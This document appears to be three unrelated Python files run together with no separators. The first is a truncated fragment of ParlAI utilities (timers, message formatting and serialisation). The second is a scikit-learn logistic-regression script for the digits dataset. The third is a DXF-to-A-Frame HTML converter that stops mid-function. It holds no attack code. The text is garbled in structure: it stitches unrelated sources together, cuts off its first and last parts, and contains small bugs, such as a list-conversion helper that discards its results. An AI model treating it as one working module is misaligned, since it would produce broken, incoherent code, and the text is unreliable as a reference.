""" self.running = True self.total = 0 self.start = time.time() def reset(self): """ Reset timer to zero. """ self.running = True self.total = 0 self.start = time.time() return self def resume(self): """ Resume timer. """ if not self.running: self.running = True self.start = time.time() return self def stop(self): """ Pause timer. """ if self.running: self.running = False self.total += time.time() - self.start return self def time(self): """ Get current timer time. """ if self.running: return self.total + time.time() - self.start return self.total class TimeLogger: """ Class for logging time progress against a goal. """ def __init__(self): """ Set up timer. """ self.timer = Timer() self.tot_time = 0 def total_time(self): """ Return time elapsed at last log call. """ return self.tot_time def time(self): """ Return current timer time. """ return self.timer.time() def log(self, done, total, report=None): """ Log report, time elapsed, and percentage progress towards goal. :param done: number of examples completed so far :param total: total number of elements to be completed. if total > 0, calculates the time remaining and percentage complete. :param report: dict of pairs to log :returns: tuple log string, log dict log string contains time elapsed and string representation of the log dict log dict contains pairs of all items to log, which includes percentage complete and projected time left if total > 0 """ from parlai.core.metrics import Metric # delay import to prevent circular dep if isinstance(done, Metric): done = done.value() self.tot_time += self.timer.time() self.timer.reset() log = {} log['exs'] = done if total > 0: log['%done'] = done / total if log["%done"] > 0: time_left = self.tot_time / log['%done'] - self.tot_time log['time_left'] = str(int(time_left)) + 's' z = '%.2f' % (100 * log['%done']) log['%done'] = str(z) + '%' if report: log = {**report, **log} int_time = int(self.tot_time) report_s = json.dumps(nice_report(log)) text = f'{int_time}s elapsed: {report_s}' return text, log class AttrDict(dict): """ Helper class to have a dict-like object with dot access. For example, instead of `d = {'key': 'value'}` use `d = AttrDict(key='value')`. To access keys, instead of doing `d['key']` use `d.key`. 
While this has some limitations on the possible keys (for example, do not set the key `items` or you will lose access to the `items()` method), this can make some code more clear. """ def __init__(self, *args, **kwargs): """ Initialize AttrDict using input dict. """ super().__init__(*args, **kwargs) self.__dict__ = self class NoLock(object): """ Empty `lock`. Does nothing when you enter or exit. """ def __enter__(self): """ No-op. """ return self def __exit__(self, exc_type, exc_value, exc_traceback): """ No-op. """ pass def nice_report(report): from parlai.core.metrics import Metric output = {} for k, v in report.items(): if isinstance(v, Metric): v = v.value() if isinstance(v, float): v = round_sigfigs(v, 4) output[k] = v return output def round_sigfigs(x: Union[float, 'torch.Tensor'], sigfigs=4) -> float: """ Round value to specified significant figures. :param x: input number :param sigfigs: number of significant figures to return :returns: float number rounded to specified sigfigs """ x_: float if __TORCH_AVAILABLE and isinstance(x, torch.Tensor): x_ = x.item() else: x_ = x # type: ignore try: if x_ == 0: return 0 return round(x_, -math.floor(math.log10(abs(x_)) - sigfigs + 1)) except (ValueError, OverflowError) as ex: if x_ in [float('inf'), float('-inf')] or x_ != x_: # inf or nan return x_ else: raise ex single_nolock = NoLock() def no_lock(): """ Build a nolock for other classes to use for no-op locking. """ return single_nolock class PaddingUtils(object): """ Helps with padding input and target tensors. DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ # DEPRECATIONDAY: delete! @classmethod def pad_text( cls, observations, dictionary, end_idx=None, null_idx=0, dq=False, eval_labels=True, truncate=None, ): """ Pad observations to max width. We check that examples are valid, pad with zeros, and sort by length so that we can use the pack_padded function. The list valid_inds keeps track of which indices are valid and the order in which we sort the examples. dq -- whether we should use deque or list eval_labels -- whether or not we want to consider eval labels truncate -- truncate input and output lengths DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. 
""" def valid(obs): # check if this is an example our model should actually process return 'text' in obs and len(obs['text']) > 0 try: # valid examples and their indices valid_inds, exs = zip( *[(i, ex) for i, ex in enumerate(observations) if valid(ex)] ) except ValueError: # zero examples to process in this batch, so zip failed to unpack return None, None, None, None, None, None # `x` text is already tokenized and truncated # sort by length so we can use pack_padded if any(['text2vec' in ex for ex in exs]): parsed_x = [ex['text2vec'] for ex in exs] else: parsed_x = [dictionary.txt2vec(ex['text']) for ex in exs] if len(parsed_x) > 0 and not isinstance(parsed_x[0], deque): if dq: parsed_x = [deque(x, maxlen=truncate) for x in parsed_x] elif truncate is not None and truncate > 0: parsed_x = [x[-truncate:] for x in parsed_x] x_lens = [len(x) for x in parsed_x] ind_sorted = sorted(range(len(x_lens)), key=lambda k: -x_lens[k]) exs = [exs[k] for k in ind_sorted] valid_inds = [valid_inds[k] for k in ind_sorted] parsed_x = [parsed_x[k] for k in ind_sorted] end_idxs = [x_lens[k] for k in ind_sorted] eval_labels_avail = any(['eval_labels' in ex for ex in exs]) labels_avail = any(['labels' in ex for ex in exs]) if eval_labels: some_labels_avail = eval_labels_avail or labels_avail else: some_labels_avail = labels_avail max_x_len = max(x_lens) # pad with zeros if dq: parsed_x = [ x if len(x) == max_x_len else x + deque((null_idx,)) * (max_x_len - len(x)) for x in parsed_x ] else: parsed_x = [ x if len(x) == max_x_len else x + [null_idx] * (max_x_len - len(x)) for x in parsed_x ] xs = parsed_x # set up the target tensors ys = None labels = None y_lens = None if some_labels_avail: # randomly select one of the labels to update on (if multiple) if labels_avail: labels = [random.choice(ex.get('labels', [''])) for ex in exs] else: labels = [random.choice(ex.get('eval_labels', [''])) for ex in exs] # parse each label and append END if dq: parsed_y = [deque(maxlen=truncate) for _ in labels] for deq, y in zip(parsed_y, labels): deq.extendleft(reversed(dictionary.txt2vec(y))) else: parsed_y = [dictionary.txt2vec(label) for label in labels] if end_idx is not None: for y in parsed_y: y.append(end_idx) y_lens = [len(y) for y in parsed_y] max_y_len = max(y_lens) if dq: parsed_y = [ y if len(y) == max_y_len else y + deque((null_idx,)) * (max_y_len - len(y)) for y in parsed_y ] else: parsed_y = [ y if len(y) == max_y_len else y + [null_idx] * (max_y_len - len(y)) for y in parsed_y ] ys = parsed_y return xs, ys, labels, valid_inds, end_idxs, y_lens @classmethod def map_predictions( cls, predictions, valid_inds, batch_reply, observations, dictionary, end_idx, report_freq=0.1, labels=None, answers=None, ys=None, ): """ Match predictions to original index in the batch. Predictions are mapped back to appropriate indices in the batch_reply using valid_inds. report_freq -- how often we report predictions DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. 
""" for i in range(len(predictions)): # map the predictions back to non-empty examples in the batch # we join with spaces since we produce tokens one at a timelab curr = batch_reply[valid_inds[i]] output_tokens = [] j = 0 for c in predictions[i]: if c == end_idx and j != 0: break else: output_tokens.append(c) j += 1 curr_pred = dictionary.vec2txt(output_tokens) curr['text'] = curr_pred if labels is not None and answers is not None and ys is not None: y = [] for c in ys[i]: if c == end_idx: break else: y.append(c) answers[valid_inds[i]] = y elif answers is not None: answers[valid_inds[i]] = curr_pred if random.random() > (1 - report_freq): # log sometimes print('TEXT: ', observations[valid_inds[i]]['text']) print('PREDICTION: ', curr_pred, '\n~') return def clip_text(text, max_len): """ Clip text to max length, adding ellipses. """ if len(text) > max_len: begin_text = ' '.join(text[: math.floor(0.8 * max_len)].split(' ')[:-1]) end_text = ' '.join( text[(len(text) - math.floor(0.2 * max_len)) :].split(' ')[1:] ) if len(end_text) > 0: text = begin_text + ' ...\n' + end_text else: text = begin_text + ' ...' return text def _ellipse(lst: List[str], max_display: int = 5, sep: str = '|') -> str: """ Like join, but possibly inserts an ellipsis. :param lst: The list to join on :param int max_display: the number of items to display for ellipsing. If -1, shows all items :param string sep: the delimiter to join on """ # copy the list (or force it to a list if it's a set) choices = list(lst) # insert the ellipsis if necessary if max_display > 0 and len(choices) > max_display: ellipsis = '...and {} more'.format(len(choices) - max_display) choices = choices[:max_display] + [ellipsis] return sep.join(str(c) for c in choices) def display_messages( msgs: List[Dict[str, Any]], prettify: bool = False, ignore_fields: str = '', max_len: int = 1000, ) -> Optional[str]: """ Return a string describing the set of messages provided. If prettify is true, candidates are displayed using prettytable. ignore_fields provides a list of fields in the msgs which should not be displayed. """ def _token_losses_line( msg: Dict[str, Any], ignore_fields: List[str], space: str ) -> Optional[str]: """ Displays the loss associated with each token. Can be used for debugging generative models. See TorchGeneratorAgent._construct_token_losses for an example implementation. """ key = 'token_losses' token_losses = msg.get(key, None) if key in ignore_fields or not token_losses: return None # Reduce losses to 4 significant figures formatted_tl = ' | '.join( [f"{tl[0]} {float('{:.4g}'.format(tl[1]))}" for tl in token_losses] ) return f'{space}[{key}]: {formatted_tl}' lines = [] episode_done = False ignore_fields_ = ignore_fields.split(',') for index, msg in enumerate(msgs): if msg is None or (index == 1 and 'agent_reply' in ignore_fields_): # We only display the first agent (typically the teacher) if we # are ignoring the agent reply. continue if msg.get('episode_done'): episode_done = True # Possibly indent the text (for the second speaker, if two). space = '' if len(msgs) == 2 and index == 1: space = ' ' # Only display rewards !=0 as they are confusing in non-RL tasks. 
if msg.get('reward', 0) != 0: lines.append(space + '[reward: {r}]'.format(r=msg['reward'])) for key in msg: if key not in DISPLAY_MESSAGE_DEFAULT_FIELDS and key not in ignore_fields_: if type(msg[key]) is list: line = '[' + key + ']:\n ' + _ellipse(msg[key], sep='\n ') else: line = '[' + key + ']: ' + clip_text(str(msg.get(key)), max_len) lines.append(space + line) if type(msg.get('image')) in [str, torch.Tensor]: lines.append(f'[ image ]: {msg["image"]}') if msg.get('text', ''): text = clip_text(msg['text'], max_len) ID = '[' + msg['id'] + ']: ' if 'id' in msg else '' lines.append(space + ID + text) for field in {'labels', 'eval_labels', 'label_candidates', 'text_candidates'}: if msg.get(field) and field not in ignore_fields_: lines.append('{}[{}: {}]'.format(space, field, _ellipse(msg[field]))) # Handling this separately since we need to clean up the raw output before displaying. token_loss_line = _token_losses_line(msg, ignore_fields_, space) if token_loss_line: lines.append(token_loss_line) if episode_done: lines.append('- - - - - - - - - - - - - - - - - - - - -') return '\n'.join(lines) def str_to_msg(txt, ignore_fields=''): """ Convert formatted string to ParlAI message dict. :param txt: formatted string to convert. String format is tab-separated fields, with colon separating field name and contents. :param ignore_fields: (default '') comma-separated field names to not include in the msg dict even if they're in the string. """ def tostr(txt): txt = str(txt) txt = txt.replace('\\t', '\t') txt = txt.replace('\\n', '\n') txt = txt.replace('__PIPE__', '|') return txt def tolist(txt): vals = txt.split('|') for v in vals: v = tostr(v) return vals def convert(key, value): if key == 'text' or key == 'id': return tostr(value) elif ( key == 'label_candidates' or key == 'labels' or key == 'eval_labels' or key == 'text_candidates' ): return tolist(value) elif key == 'episode_done': return bool(value) else: return tostr(value) if txt == '' or txt is None: return None msg = {} for t in txt.split('\t'): ind = t.find(':') key = t[:ind] value = t[ind + 1 :] if key not in ignore_fields.split(','): msg[key] = convert(key, value) msg['episode_done'] = msg.get('episode_done', False) return Message(msg) def msg_to_str(msg, ignore_fields=''): """ Convert ParlAI message dict to string. :param msg: dict to convert into a string. :param ignore_fields: (default '') comma-separated field names to not include in the string even if they're in the msg dict. """ def filter(txt): txt = str(txt) txt = txt.replace('\t', '\\t') txt = txt.replace('\n', '\\n') txt = txt.replace('|', '__PIPE__') return txt def add_field(name, data): if name == 'reward' and data == 0: return '' if name == 'episode_done' and data is False: return '' txt = '' if type(data) == tuple or type(data) == set or type(data) == list: # list entries for c in data: txt += filter(c) + "|" txt = txt[:-1] else: # single fields txt = filter(data) return name + ":" + txt + '\t' default_fields = [ 'id', 'text', 'labels', 'label_candidates', 'episode_done', 'reward', ] txt = "" ignore_fields = ignore_fields.split(',') for f in default_fields: if f in msg and f not in ignore_fields: txt += add_field(f, msg[f]) for f in msg.keys(): if f not in default_fields and f not in ignore_fields: txt += add_field(f, msg[f]) return txt.rstrip('\t') # DEPRECATION DAY: DELETE def set_namedtuple_defaults(namedtuple, default=None): """ Set *all* of the fields for a given nametuple to a singular value. Additionally removes the default docstring for each field. 
Modifies the tuple in place, but returns it anyway. More info: https://stackoverflow.com/a/18348004 :param namedtuple: A constructed collections.namedtuple :param default: The default value to set. :returns: the modified namedtuple """ namedtuple.__new__.__defaults__ = (default,) * len(namedtuple._fields) for f in namedtuple._fields: del getattr(namedtuple, f).__doc__ return namedtuple _seen_warnings: Set[str] = set() def warn_once(msg: str, warningtype=None) -> None: """ Raise a warning, but only once. :param str msg: Message to display :param Warning warningtype: Type of warning, e.g. DeprecationWarning """ global _seen_warnings if msg not in _seen_warnings: _seen_warnings.add(msg) warnings.warn(msg, warningtype, stacklevel=2)
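# Minimal round-trip sketch for the serialisation helpers above (an
# illustrative addition, not part of the original module): msg_to_str()
# flattens a message dict into tab-separated "key:value" fields, and
# str_to_msg() parses that format back, splitting '|'-separated fields such
# as labels into lists.
if __name__ == '__main__':
    example = {
        'id': 'teacher',
        'text': 'hello\nworld',    # newlines/tabs/pipes are escaped in the string form
        'labels': ['hi', 'hey'],   # list fields are joined with '|'
        'episode_done': True,
    }
    line = msg_to_str(example)
    # e.g. "id:teacher\ttext:hello\\nworld\tlabels:hi|hey\tepisode_done:True"
    parsed = str_to_msg(line)
    assert parsed['text'] == 'hello\nworld'
    assert parsed['labels'] == ['hi', 'hey']
    assert parsed['episode_done'] is True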
#!/usr/bin/python
# Import necessary libraries/modules
import os
import sys
sys.path.append(os.path.join("..", ".."))
import argparse
import numpy as np
from sklearn import metrics
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score


class LogRegMNIST():
    """This is a class for performing a Logistic Regression classification on the scikit-learn digits (MNIST-style) dataset.
    """
    def __init__(self, digits, args):
        self.args = args
        self.X = digits.data.astype("float")  # extracting data
        self.y = digits.target  # extracting labels

    def split(self):
        """Function for splitting the dataset into train and test sets.
        """
        # Normalize (min-max scaling)
        self.X = (self.X - self.X.min())/(self.X.max() - self.X.min())
        # Split into train and test set
        self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, random_state=self.args['random_state'], train_size=1-self.args['test_size'], test_size=self.args['test_size'])

    def train_model(self):
        """Function for training the Logistic Regression classifier.
        """
        # Initialise model and fit that model to the training data and labels
        clf = LogisticRegression(penalty='none', tol=0.1, solver='saga', multi_class='multinomial').fit(self.X_train, self.y_train)
        return clf

    def calc_eval_metrics(self, clf):
        """Function for calculating evaluation metrics.
        Input:
            clf: trained Logistic Regression classifier
        """
        # Take the trained model and use it to predict the test classes
        self.y_pred = clf.predict(self.X_test)
        # Calculate evaluation metrics
        cm = metrics.classification_report(self.y_test, self.y_pred)
        return cm

    def save_eval_metrics(self, cm):
        """Function for saving file with evaluation metrics.
        Input:
            cm: evaluation metrics
        """
        # Specifying output path
        outpath = os.path.join("out", f"{self.args['filename']}.txt")
        # Writing file
        with open(outpath, "w", encoding="utf-8") as file:
            file.write(cm)

    def run_classifier(self):
        """Function for running all functions within the class in the correct order.
        """
        # Splitting data
        self.split()
        # Train model
        clf = self.train_model()
        # Calculate evaluation metrics
        cm = self.calc_eval_metrics(clf)
        # Print evaluation metrics
        print(f"\n EVALUATION METRICS: \n {cm}")
        # Save evaluation metrics
        self.save_eval_metrics(cm)

# Creating a function that checks whether a given value is between 0 and 1 and raises an error if it is not. This is used to ensure that only a test_size argument within the correct range can be passed on the command line.
def percentFloat(string):
    value = float(string)
    if value < 0 or value > 1:
        raise argparse.ArgumentTypeError('Value has to be between 0 and 1')
    return value

def main():
    ap = argparse.ArgumentParser(description="[INFO] This script uses the scikit-learn digits data set, trains a Logistic Regression classifier, prints the evaluation metrics to the terminal, and saves them to a file.")
    # Argument for specifying a random-state value
    ap.add_argument("-rs", "--random_state",
                    required=False,
                    type=int,
                    default=9,
                    help="int, value for random state of model")
    # Argument for specifying size of test set
    ap.add_argument("-ts", "--test_size",
                    required=False,
                    type=percentFloat,  # here I use the function I created above
                    default=0.2,
                    help="float, proportional size of test set (must be a number between 0 and 1)")
    # Argument for specifying filename of evaluation metrics
    ap.add_argument("-fn", "--filename",
                    required=False,
                    type=str,
                    default="evaluation_metrics_LR",
                    help="str, filename for saving the evaluation metrics")
    args = vars(ap.parse_args())
    # Loading data
    digits = datasets.load_digits()
    # Turning into LogRegMNIST object (the class I created above)
    logreg = LogRegMNIST(digits, args)
    # Perform classification
    logreg.run_classifier()

# Define behaviour when called from command line
if __name__ == "__main__":
    main()
    print("[INFO] The evaluation metrics have been saved in 'out/'.")
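# Illustrative programmatic entry point (an addition for clarity, not part of
# the original script): the classifier can also be driven directly from Python
# with a plain args dict instead of the command line.  Note that
# save_eval_metrics() writes into an existing 'out/' folder and does not
# create it.
def run_example(test_size=0.2, random_state=9, filename="evaluation_metrics_LR"):
    digits = datasets.load_digits()
    args = {"random_state": random_state, "test_size": test_size, "filename": filename}
    LogRegMNIST(digits, args).run_classifier()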
from math import radians, sin, cos, asin, degrees, pi, sqrt, pow, fabs, atan2 def parse_dxf(dxf_f, material_gallery): output = {} layer_color = {} flag = False x = 0 value = 'dummy' while value !='ENTITIES': key = dxf_f.readline().strip() value = dxf_f.readline().strip() if value == 'AcDbLayerTableRecord':#dict of layer names and colors key = dxf_f.readline().strip() layer_name = dxf_f.readline().strip() key = dxf_f.readline().strip() value = dxf_f.readline().strip() key = dxf_f.readline().strip() layer_color[layer_name] = cad2hex(dxf_f.readline().strip()) elif value=='EOF' or key=='':#security to avoid loops if file is corrupted return output while value !='ENDSEC': key = dxf_f.readline().strip() value = dxf_f.readline().strip() if value=='EOF' or key=='':#security to avoid loops if file is corrupted return output if flag == 'face':#stores values for 3D faces if key == '8':#layer name data[key] = value elif key == '10' or key == '11' or key == '12' or key == '13':#X position data[key] = float(value) elif key == '20' or key == '21' or key == '22' or key == '23':#mirror Y position data[key] = -float(value) elif key == '30' or key == '31' or key == '32' or key == '33':#Z position data[key] = float(value) elif flag == 'block':#stores values for blocks if key == '2':#block name data[key] = value if key == '8':#layer name data[key] = value data['layer'] = value#sometimes key 8 is replaced, so I need the original layer value elif key == '10' or key == '30':#X Z position data[key] = float(value) elif key == '20':#Y position, mirrored data[key] = -float(value) elif key == '50':#Z rotation data[key] = float(value) elif key == '41' or key == '42' or key == '43':#scale values data[key] = float(value) elif key == '210':#X of OCS unitary vector Az_1 = float(value) P_x = data['10'] elif key == '220':#Y of OCS unitary vector Az_2 = float(value) P_y = -data['20']#reset original value elif key == '230':#Z of OCS unitary vector Az_3 = float(value) P_z = data['30'] #arbitrary axis algorithm #see if OCS z vector is close to world Z axis if fabs(Az_1) < (1/64) and fabs(Az_2) < (1/64): W = ('Y', 0, 1, 0) else: W = ('Z', 0, 0, 1) #cross product for OCS x arbitrary vector, normalized Ax_1 = W[2]*Az_3-W[3]*Az_2 Ax_2 = W[3]*Az_1-W[1]*Az_3 Ax_3 = W[1]*Az_2-W[2]*Az_1 Norm = sqrt(pow(Ax_1, 2)+pow(Ax_2, 2)+pow(Ax_3, 2)) Ax_1 = Ax_1/Norm Ax_2 = Ax_2/Norm Ax_3 = Ax_3/Norm #cross product for OCS y arbitrary vector, normalized Ay_1 = Az_2*Ax_3-Az_3*Ax_2 Ay_2 = Az_3*Ax_1-Az_1*Ax_3 Ay_3 = Az_1*Ax_2-Az_2*Ax_1 Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2)) Ay_1 = Ay_1/Norm Ay_2 = Ay_2/Norm Ay_3 = Ay_3/Norm #insertion world coordinates from OCS data['10'] = P_x*Ax_1+P_y*Ay_1+P_z*Az_1 data['20'] = P_x*Ax_2+P_y*Ay_2+P_z*Az_2 data['30'] = P_x*Ax_3+P_y*Ay_3+P_z*Az_3 #OCS X vector translated into WCS Ax_1 = ((P_x+cos(radians(data['50'])))*Ax_1+(P_y+sin(radians(data['50'])))*Ay_1+P_z*Az_1)-data['10'] Ax_2 = ((P_x+cos(radians(data['50'])))*Ax_2+(P_y+sin(radians(data['50'])))*Ay_2+P_z*Az_2)-data['20'] Ax_3 = ((P_x+cos(radians(data['50'])))*Ax_3+(P_y+sin(radians(data['50'])))*Ay_3+P_z*Az_3)-data['30'] #cross product for OCS y vector, normalized Ay_1 = Az_2*Ax_3-Az_3*Ax_2 Ay_2 = Az_3*Ax_1-Az_1*Ax_3 Ay_3 = Az_1*Ax_2-Az_2*Ax_1 Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2)) Ay_1 = Ay_1/Norm Ay_2 = Ay_2/Norm Ay_3 = Ay_3/Norm #A-Frame rotation order is Yaw(Z), Pitch(X) and Roll(Y) #thanks for help Marilena Vendittelli and https://www.geometrictools.com/ if Ay_3<1: if Ay_3>-1: pitch = asin(Ay_3) yaw = atan2(-Ay_1, Ay_2) roll = 
atan2(-Ax_3, Az_3) else: pitch = -pi/2 yaw = -atan2(Az_1, Ax_1) roll = 0 else: pitch = pi/2 yaw = atan2(Az_1, Ax_1) roll = 0 #Y position, mirrored data['20'] = -data['20'] #rotations from radians to degrees data['210'] = degrees(pitch) data['50'] = degrees(yaw) data['220'] = -degrees(roll) elif flag == 'attrib':#stores values for attributes within block if key == '1':#attribute value attr_value = value elif key == '2':#attribute key data[value] = attr_value flag = 'block'#restore block modality if key == '0': invisible = False#by default layer is visible if flag == 'face':#close 3D face data['2'] = '3dface' #is material set in model? try: material = material_gallery.get(layer = data['8']) data['color'] = material.color invisible = material.invisible#layer visibility except: data['color'] = layer_color[data['8']] data['8'] = 'default' if invisible: flag = False else: data['num'] = x output[x] = data if data['12']!=data['13'] or data['22']!=data['23'] or data['32']!=data['33']: data2 = data.copy() data2['11'] = data['12'] data2['21'] = data['22'] data2['31'] = data['32'] data2['12'] = data['13'] data2['22'] = data['23'] data2['32'] = data['33'] x += 1 data2['num'] = x output[x] = data2 flag = False elif value == 'ATTRIB':#start attribute within block attr_value = '' flag = 'attrib' elif flag == 'block':#close block #material images are patterns? is material set in model? try: material = material_gallery.get(layer = data['8']) data['color'] = material.color invisible = material.invisible#layer visibility if material.pattern:# == True data['repeat']=True except: data['color'] = layer_color[data['8']] data['8'] = 'default' if invisible: flag = False else: data['num'] = x output[x] = data flag = False if value == '3DFACE':#start 3D face data = {}#default values flag = 'face' x += 1 elif value == 'INSERT':#start block data = {'41': 1, '42': 1, '43': 1, '50': 0, '210': 0, '220': 0, '230': 1,'repeat': False, 'type': '','animation': False}#default values flag = 'block' x += 1 return output def make_html(page_obj, collection, partitions, finishings, csv_f): output = {} for x, data in collection.items(): if data['2'] == '3dface': output[x] = make_triangle(page_obj, x, data) if data['2'] == '6planes':#left for legacy output[x] = make_box(page_obj, x, data) elif data['2'] == 'box' or data['2'] == 'a-box': output[x] = make_box(page_obj, x, data) elif data['2'] == 'cylinder' or data['2'] == 'a-cylinder': output[x] = make_cylinder(page_obj, x, data) elif data['2'] == 'a-curvedimage': output[x] = make_curvedimage(x, data) elif data['2'] == 'cone' or data['2'] == 'a-cone': output[x] = make_cone(page_obj, x, data) elif data['2'] == 'sphere' or data['2'] == 'a-sphere': output[x] = make_sphere(page_obj, x, data) elif data['2'] == 'circle' or data['2'] == 'a-circle': output[x] = make_circle(page_obj, x, data) elif data['2'] == 'plane' or data['2'] == 'a-plane' or data['2'] == 'look-at': output[x] = make_plane(page_obj, x, data) elif data['2'] == 'floor':#left for legacy data['210'] = data['210'] - 90 output[x] = make_plane(page_obj, x, data) elif data['2'] == 'ceiling':#left for legacy data['210'] = data['210'] + 90 output[x] = make_plane(page_obj, x, data) elif data['2'] == 'light' or data['2'] == 'a-light': output[x] = make_light(page_obj, x, data) elif data['2'] == 'a-text': output[x] = make_text(x, data) elif data['2'] == 'a-link': output[x] = make_link(page_obj, x, data) elif data['2'] == 'a-door': door = AOpening(page_obj, data, partitions, finishings, csv_f) if door.type_obj: door.has_type()#changes 
colors and writes to csv else: door.no_type()#writes to csv if door.finish_obj: door.has_finishing()#changes colors again if door.d['alert'] == 'None': output[x] = door.write_html() else:#by now useless, if is always true pass #output[x] = door.write_html_alert() elif data['2'] == 'a-furniture': furn = AFurniture(page_obj, data, finishings) if furn.finish_obj: furn.has_finishing()#changes colors output[x] = furn.write_html() elif data['2'] == 'a-wall' or data['2'] == 'a-slab' or data['2'] == 'a-openwall': part = APartition(page_obj, data, partitions, finishings, csv_f) if part.type_obj: part.calc_weight() else: part.no_weight() #here we could add the has_finishing, as in AOpening if part.d['alert'] == 'None': output[x] = part.write_html() else: output[x] = part.write_html_alert() return output def reference_openings(collection): collection2 = collection.copy() for x, data in collection.items(): if data['2'] == 'a-door': collection[x] = data for x2, data2 in collection2.items(): if data2['2'] == 'a-wall': if data['210']==0 and data['220']==0 and data2['210']==0 and data2['220']==0: data2 = door_straight_case(x, data, data2) else: data2 = door_tilted_case(x, data, data2) collection[x2] = data2 return collection def reference_animations(collection):#TODO collection2 = collection.copy() for x, data in collection.items(): if data['2'] == 'a-animation': collection[x] = data for x2, data2 in collection2.items(): if data2['2'] != '3dface' or data2['2'] != 'a-wall' or data2['2'] != 'a-openwall' or data2['2'] != 'a-door': if data['10']==data2['10'] and data['20']==data2['20'] and data['30']==data2['30']: data2['animation'] = True data2['ATTRIBUTE'] = data['ATTRIBUTE'] data2['FROM'] = data['FROM'] data2['TO'] = data['TO'] data2['BEGIN'] = data['BEGIN'] data2['DIRECTION'] = data['DIRECTION'] data2['REPEAT'] = data['REPEAT'] data2['DURATION'] = data['DURATION'] collection[x2] = data2 return collection def door_straight_case(x, data, data2): if data['30']==data2['30'] and data['43']>0 and data2['43']>0: rotd = round(data['50'], 0) rotw = round(data2['50'], 0) if rotd==rotw-180 or rotd-180==rotw: backwards = -1 else: backwards = 1 if rotd == rotw or backwards == -1: #translation xt = data['10']-data2['10'] zt = data['20']-data2['20'] #rotation alfa = radians(data2['50']) xd = round(xt*cos(alfa)-zt*sin(alfa), 4) zd = round(xt*sin(alfa)+zt*cos(alfa), 4) xde = xd + round(data['41'], 4)*backwards zde = zd + round(data['42'], 4) #wall bounding box if data2['41'] > 0: xmaxw = round(data2['41'], 4) xminw = 0 else: xmaxw = 0 xminw = round(data2['41'], 4) if data2['42'] > 0: zmaxw = 0 zminw = -round(data2['42'], 4) else: zmaxw = -round(data2['42'], 4) zminw = 0 #door bounding box if xde > xd: xmaxd = xde xmind = xd else: xmaxd = xd xmind = xde if zde > zd: zmaxd = zde * ( - backwards) zmind = zd * ( - backwards) else: zmaxd = zd * ( - backwards) zmind = zde * ( - backwards) #door inclusion if xmaxw >= xmaxd and xminw <= xmind and zmaxw >= zmaxd and zminw <= zmind: data2['door'] = x data2['2'] = 'a-openwall' if data['43']>data2['43']: data2['door_height'] = data2['43'] else: data2['door_height'] = data['43'] if data2['41']>0: data2['door_off_1'] = xmind data2['door_off_2'] = xmaxd else: data2['door_off_1'] = xmaxd - xmaxw data2['door_off_2'] = xmind - xmaxw return data2 #TODO def door_tilted_case(x, data, data2): #d210 = round(data['210']*fabs(data['41'])/data['41'], 4) #d220 = round(data['220']*fabs(data['42'])/data['42'], 4) #d50 = round(data['50']*fabs(data['43'])/data['43'], 4) #w210 = 
round(data2['210']*fabs(data2['41'])/data2['41'], 4) #w220 = round(data2['220']*fabs(data2['42'])/data2['42'], 4) #w50 = round(data2['50']*fabs(data2['43'])/data2['43'], 4) return data2 #returns repeat image values def is_repeat(repeat, rx, ry): if repeat: output = f'; repeat:{fabs(rx)} {fabs(ry)}' return output else: return ';' #returns positive/negative scaling def unit(nounit): unit = fabs(nounit)/nounit return unit def make_box(page_obj, x, data): outstr = f'<a-entity id="box-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-box id="box-{x}" \n' outstr += f'position="{data['41']/2} {data['43']/2} {-data['42']/2}" \n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' outstr += 'geometry="' try: if data['segments-depth']!='1': outstr += f'segments-depth: {data['segments-depth']};' if data['segments-height']!='1': outstr += f'segments-height: {data['segments-height']};' if data['segments-width']!='1': outstr += f'segments-width: {data['segments-width']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-box>\n</a-entity>\n' return outstr def is_animation(data): outstr = f'<a-animation attribute="{data['ATTRIBUTE']}"\n' outstr += f'from="{data['FROM']}"\n' outstr += f'to="{data['TO']}"\n' outstr += f'begin="{data['BEGIN']}"\n' outstr += f'direction="{data['DIRECTION']}"\n' outstr += f'repeat="{data['REPEAT']}"\n' outstr += f'duration="{data['DURATION']}"\n' outstr += '></a-animation>\n' return outstr def make_cone(page_obj, x, data): outstr = f'<a-entity id="cone-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-cone id="cone-{x}" \n' outstr += f'position="0 {data['43']/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' outstr += 'geometry="' try: if data['open-ended']!='false': outstr += 'open-ended: true;' if data['radius-top']!='0': outstr += f'radius-top: {data['radius-top']};' if data['segments-height']!='18': outstr += f'segments-height: {data['segments-height']};' if data['segments-radial']!='36': outstr += f'segments-radial: {data['segments-radial']};' if data['theta-length']!='360': outstr += f'theta-length: {data['theta-length']};' if data['theta-start']!='0': outstr += f'theta-start: {data['theta-start']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-cone>\n</a-entity>\n' return outstr def make_circle(page_obj, x, data): outstr = f'<a-entity id="circle-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} 